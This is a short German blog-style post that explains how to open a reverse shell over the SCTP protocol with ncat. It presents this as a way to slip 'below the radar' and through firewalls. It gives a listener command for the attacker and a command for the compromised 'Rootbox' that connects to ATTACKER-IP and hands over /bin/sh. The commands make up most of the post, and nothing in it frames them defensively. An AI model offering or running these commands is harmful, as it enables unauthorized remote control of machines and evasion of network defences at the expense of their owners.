SCTP Reverse Shell

Eine "reverse shell" ist ein interessantes Konzept. Vor allem dann, wenn es sich unterhalb des "Radars" bewegt. Schön verschlüsselt kann es fast über beliebige Ports die Firewall durchbohren. Die Unterstützung kommt aus dem Kernel, so dass ein modprobe sctp im Normalfall positiv ausfallen dürfte.

Das kleine Tool ncat stammt aus dem Package nmap und stellt eine frische Variante von Netcat dar.

Attacker: ncat --sctp -l -v -p PORT

Rootbox: ncat --sctp -c /bin/sh ATTACKER-IP PORT

Nun kann auf "Attacker"-Seite ganz lässig eine Shell betrieben werden, die faktisch auf der Seite der "Rootbox" ausgeführt wird. Schön, wenn mal kein SSH zur Verfügung steht. ;-)